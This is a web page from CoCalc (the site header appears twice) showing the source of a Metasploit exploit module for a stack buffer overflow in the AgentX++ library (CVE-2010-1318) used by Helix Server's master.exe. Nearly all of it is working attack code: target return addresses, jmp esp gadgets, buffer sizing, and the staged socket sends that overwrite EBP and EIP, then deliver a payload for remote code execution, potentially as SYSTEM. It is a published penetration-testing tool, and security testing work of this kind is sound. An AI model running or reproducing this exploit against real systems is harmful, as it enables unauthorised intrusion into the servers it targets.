CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/misc/agentxpp_receive_agentx.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp9#include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',14'Description' => %q{15This exploits a stack buffer overflow in the AgentX++ library, as used by16various applications. By sending a specially crafted request, an attacker can17execute arbitrary code, potentially with SYSTEM privileges.1819This module was tested successfully against master.exe as included with Real20Network\'s Helix Server v12. When installed as a service with Helix Server,21the service runs as SYSTEM, has no recovery action, but will start automatically22on boot.2324This module does not work with NX/XD enabled but could be modified easily to25do so. The address26},27'Author' => [ 'jduck' ],28'License' => MSF_LICENSE,29'References' =>30[31[ 'CVE', '2010-1318' ],32[ 'OSVDB', '63919'],33[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]34],35'Privileged' => true,36'DefaultOptions' =>37{38#'EXITFUNC' => 'seh',39},40'Payload' =>41{42'Space' => 1024, # plenty of space43'BadChars' => "", # none!44'DisableNops' => true,45'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"46},47'Platform' => 'win',48'Targets' =>49[50[ 'Helix Server v12 and v13 - master.exe',51{52# The BufAddr varies :-/53#'BufAddr' => 0xea3800,54'BufAddr' => 0x1053880,55'BufSize' => 25000, # If this is too large, the buf is unmapped on free56'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe57'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll58}59]60],61'DefaultTarget' => 0,62'DisclosureDate' => '2010-04-16'))6364register_options([Opt::RPORT(705)])65end6667def exploit68print_status("Trying target #{target.name}...")6970connect71print_status("Triggering the vulnerability... Cross your fingers!")7273num = target['BufSize']74num_str = [num].pack('N')7576# First send 19 bytes to almost fill the buffer...77hdr = ''78hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')79hdr << rand_text(16 - hdr.length)80#hdr << "QQQQRRRRSSSS"81hdr << num_str[0,3]82sock.put(hdr)8384# Wait to make sure it processed that chunk.85select(nil, nil, nil, 0.5)86#print_status("press enter to trigger..."); x = $stdin.gets8788# Send the rest (smashed!)89hdr = ''90hdr << num_str[3,1]9192# NOTE: this stuff is extra, but doesn't count towards the payload..93hdr << rand_text(8)94#hdr << "EEEEFFFF"9596# becomes ebp97#hdr << "\xeb" * 498base = target['BufAddr']99new_ebp = base + (num / 2)100if (mod4 = (num % 4)) > 0101# align to 4 bytes102new_ebp += (4 - mod4)103end104hdr << [new_ebp].pack('V')105106# becomes eip107#hdr << "\xef\xbe\xad\xde"108hdr << [target.ret].pack('V')109110# NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun111sock.put(hdr)112113# Send the data that we said we would...114stack = []115stack << target['JmpEsp']116117num_rets = (num - payload.encoded.length - 4) / 4118num_rets.times {119# points to ret instruction120stack.unshift(target.ret + 3)121}122123stack = stack.pack('V*')124stack << payload.encoded125# make sure we have all the bytes, or we wont reach the path we want.126stack << rand_text(num - stack.length)127128sock.put(stack)129130handler131disconnect132end133end134135136